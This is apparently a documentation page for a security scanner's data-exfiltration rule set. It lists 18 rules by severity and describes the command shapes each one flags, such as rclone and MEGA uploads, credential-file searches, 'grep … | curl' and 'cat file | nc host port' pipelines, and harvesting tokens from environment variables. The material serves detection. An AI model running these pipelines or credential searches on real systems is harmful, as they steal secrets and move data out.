Data Exfiltration
Detects patterns for collecting and exfiltrating sensitive data
18 rules in data_exfiltration.yml
CRITICAL: 2 | HIGH: 10 | MEDIUM: 6
| Rule ID | Severity | Title | Description | Refs |
|---|---|---|---|---|
mega_ | CRITICAL | MEGA.nz CLI Data Transfer | Uses MEGAcmd tools to upload or download data to/from MEGA.nz cloud storage | |
rclone_ | CRITICAL | Rclone Cloud Data Sync | Uses rclone to copy or sync data to remote cloud storage, a top exfiltration tool | |
azcopy_ | HIGH | AzCopy Azure Blob Transfer | azcopy copy/sync/make/remove/list targets *.blob.core.windows.net. azcopy bypasses Azure’s audit-rich Storage SDK and is a known exfiltration tool in cloud-attacker playbooks. | |
credential_ | HIGH | Credential File Search | find -name searches for SSH keys (id_rsa/id_dsa/id_ecdsa/id_ed25519), PEM/p12/pfx files, or credentials/config filenames - the canonical reconnaissance step before credential theft. | |
credential_ | HIGH | Credential Grep and Send | grep -r searches for password/secret/key strings and pipes the output to curl. The shape extracts and immediately exfiltrates any plaintext credentials it finds. | |
croc_ | HIGH | Croc Encrypted File Transfer | Uses croc to transfer files between computers with end-to-end encryption | |
database_ | HIGH | Database Dump Creation | mysqldump/pg_dump/mongodump output is redirected to a file. Dumps materialize the entire database in plaintext and need to be staged in an access-controlled location, never alongside the playbook. | |
magic_ | HIGH | Magic Wormhole Encrypted Transfer | Uses magic-wormhole to securely transfer files between computers via one-time codes | |
network_ | HIGH | Network Data Exfiltration via Shell Pipe-To-Network | A shell task chains a packet-capture or file-read tool into a network-send tool - the classic exfil primitive. Matches tcpdump -w file && curl file, cat file | nc host port, socat FILE:/path TCP:host:port, dd if=disk | gzip | openssl enc | curl, and similar pipelines. MITRE T1048 (Exfiltration Over Alternative Protocol) and T1041 (Exfiltration Over C2 Channel). Pure nc -l listener or socat syslog forwarders are NOT flagged - the pipeline-to-network-egress shape is. | |
rclone_ | HIGH | Rclone Remote Configuration | Configures rclone remote storage backends which could be used for exfiltration | |
remote_ | HIGH | Remote Copy of Sensitive Data | scp/rsync/curl -T/wget –post-file targets a path containing ‘credentials’, ‘secrets’, ‘keys’, or ‘passwords’. Sensitive files should never traverse the wire without encryption and scoped IAM. | |
sensitive_ | HIGH | Sensitive File Collection | Collecting sensitive system files that could contain secrets | |
archive_ | MEDIUM | Suspicious Archive Creation | tar/zip/7z archives a sensitive system directory (/etc, /home, /root, /var, /opt) into a single file - the staging shape used to prepare data for exfiltration. | |
environment_ | MEDIUM | Environment Variable Harvesting | env|grep is filtered against PASSWORD/SECRET/TOKEN/KEY/API. The shape harvests environment-resident credentials before they can be redacted from process state. | |
log_ | MEDIUM | Log File Collection | cat/tail/head/grep targets /var/log/auth*, /var/log/secure, or /var/log/messages. These files contain authentication events and PII subject to GDPR/HIPAA handling rules. | |
network_ | MEDIUM | Network Configuration Collection Redirected to File | A shell task runs a network-reconnaissance command (netstat, ss, ip route/addr/link, ifconfig, arp, route) and redirects its output into a file via >/>>. The combination - enumerate local network state + persist to a file - matches MITRE T1016 (System Network Configuration Discovery) / T1049 (System Network Connections Discovery) staging behaviour often seen in pre-exfil reconnaissance. Pure read-only invocations (netstat -an with no redirect) do not match. | |
process_ | MEDIUM | Process List Collection | Collecting process lists that may reveal sensitive information | |
python_ | MEDIUM | Python HTTP Server for File Serving | Runs Python’s built-in HTTP server which can serve local files to remote hosts |